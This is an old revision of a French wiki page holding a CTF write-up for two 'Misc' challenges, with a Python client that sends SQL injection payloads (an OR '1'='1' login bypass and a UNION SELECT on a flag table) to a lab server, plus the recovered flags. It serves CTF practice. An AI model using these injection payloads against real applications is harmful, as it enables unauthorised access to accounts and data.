Outils d'utilisateurs

Outils du Site


ctf_mssis_ctf

Ceci est une ancienne révision du document !


Challenges Misc 1 et 2

root@kali:~/Downloads# python client.py [+] Test level1 … Welcome on level 1 !

Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'

[+] Test level2 … Welcome on level 2 !

Citation #123 union SELECT * fROM flag:

ESE{7d2f9e9beab248febaf5bddffc3a39a4}

Code source : client.py

#encoding: utf-8

import socket import sys

# change this if needed HOST = '192.168.1.19' # change this if needed IP = 8096

def create_socket():

      try:
              s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
              s.settimeout(1)
              s.connect((HOST,IP))
      except Exception as e:
              print("Can't open socket !")
              print(e)
              sys.exit(1)
      return s

def test_level1():

      print("[+] Test level1 ...")
      s = create_socket()
      login = 'admin" OR "1"="1'
      password = 'toto" OR "1"="1"  LIMIT "1" OFFSET "2' 
      cmd = "\x01%s\x00%s" % (login,password)
      s.send(cmd.encode('utf-8'))
      msg = s.recv(1024)
      if msg and msg.decode('utf-8').startswith("Welcome"):
              print(msg.decode('utf-8'))
              res = s.recv(1024)
              print(res.decode('utf-8'))
      else:
              print("If you called a valid level, notice an admin")
      s.close()

def test_level2():

      print("[+] Test level2 ...")
      s = create_socket()
      citation = '123 union SELECT * fROM flag'
      s.send(b"\x02%s" % (citation))
      msg = s.recv(1024)
      if msg and msg.decode('utf-8').startswith("Welcome"):
              print(msg.decode('utf-8'))
              res = s.recv(1024)
              print(res.decode('utf-8'))
      else:
              print("If you called a valid level, notice an admin")
      s.close()

if name == 'main':

      test_level1()
      print("")
      test_level2()
ctf_mssis_ctf.1526205003.txt.gz · Dernière modification: 2018/05/13 11:50 par M0N5T3R